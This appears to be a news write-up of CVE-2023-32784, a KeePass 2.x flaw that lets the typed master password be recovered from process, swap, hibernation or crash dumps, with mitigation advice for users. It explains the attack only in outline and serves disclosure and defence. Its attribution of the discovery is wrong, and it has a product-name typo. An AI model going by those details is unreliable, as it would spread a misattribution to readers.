A vulnerability has been identified in KeePass password management solution that allows an attacker to recover the cleartext master password from the memory if the password is typed in using the keyboard. The password cannot be obtained if it is copied from the clipboard.
The vulnerability has been assigned the Common Vulnerability and Exposure code, CVE-2023-32784. KeePass has yet to issue a patch to address the flaw but is expected to do so in the upcoming release of KeePass 2.54, which is due to be released in early June. The vulnerability affects versions 2.x of the software. KeePassXC, StroingBox, and KeePass 1.x are not affected.
The flaw was discovered by security researcher Dominik Reichl, who developed a simple proof-of-concept tool – KeePass Master Password Dumper – that exploits the flaw, and is mostly able to recover the master password from the memory, apart from the first password character. The tool does not execute any code on the targeted system, only performing a memory dump. In a security report published on GitHub, he explained, “it doesn’t matter where the memory comes from – can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), various crash dumps or RAM dump of the entire system. It doesn’t matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it’s been since then.”
The flaw is due to the use of a text box called SecureTextBoxEx which is used for password entry. The text box creates leftover strings in memory when characters are typed using the keyboard, and due to .NET’s behavior, these are difficult to remove. Using a memory dump, it is possible to determine the likely characters in each position in a password.
KeePass users should ensure they update to the latest version of KeePass – 2.54 – when it is released in June. If KeePass has been used for some time, it is likely that the master password and potentially other passwords could be present in the pagefile/swapfile, hibernation file, and crash dump(s), which means they could potentially be obtained. Until the update is released, users can reduce the potential for exploitation by changing their Master password, restarting their computer, deleting the hibernation file and pagefile/swapfile, and overwriting deleted data on the hard drive. For maximum security, users should consider a fresh installation of the operating system.